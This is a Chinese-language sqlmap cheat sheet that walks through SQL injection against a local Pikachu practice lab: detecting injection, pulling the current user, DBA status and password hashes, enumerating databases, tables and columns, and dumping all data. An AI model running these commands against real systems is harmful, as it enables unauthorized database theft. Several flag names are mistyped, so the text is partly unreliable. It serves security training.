1、测试URL的get参数是否存在注入
--dbms:指定数据库类型
-v (1-5):输出信息等级
--batch:自动进行默认操作
格式:sqlmap -u "URL" --dbms mysql -v 1 --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --batch
2、获取敏感信息
--current-user:当前连接的用户
--current-db:当前连接的数据库
--is-dbs:是否root权限
--password:数据库的密码
格式:sqlmap -u “URL" --dbms mysql -v 1 --current-user --current-db --is-dba --passwords --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --current-uesr --current-db --is-dba --passwords --batch
3、获取所有库名
-dbs :列出所有数据库
格式:sqlmap -u “URL" --dbms mysql -v 1 --dbs --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --dbs --batch
4、获取表信息
-D:指定数据库
--tables:列出所有表
格式:sqlmap -u “URL" --dbms mysql -v 1 -D pikachu --tables --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu --tables --batch
5、获取某个表的字段信息
-T:指定表
--column:获取字段
格式:sqlmap -u “URL" --dbms mysql -v 1 -D pikachu -T users --columns --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu -T users --columns --batch
6、获取某个库的所有表和字段
-tables:列出所有表
--columns:列出所有列
格式:sqlmap -u "URL" --dbms mysql -v 1 -D pikachu --tables --columns --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu --tables --columns --batch
7、获取所有数据
--dump:导出所有数据
格式:sqlmap -u "URL" --dbms mysql -v 1 -D pikachu --tables --columns --dump --batch
sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu --tables --columns --dump --batch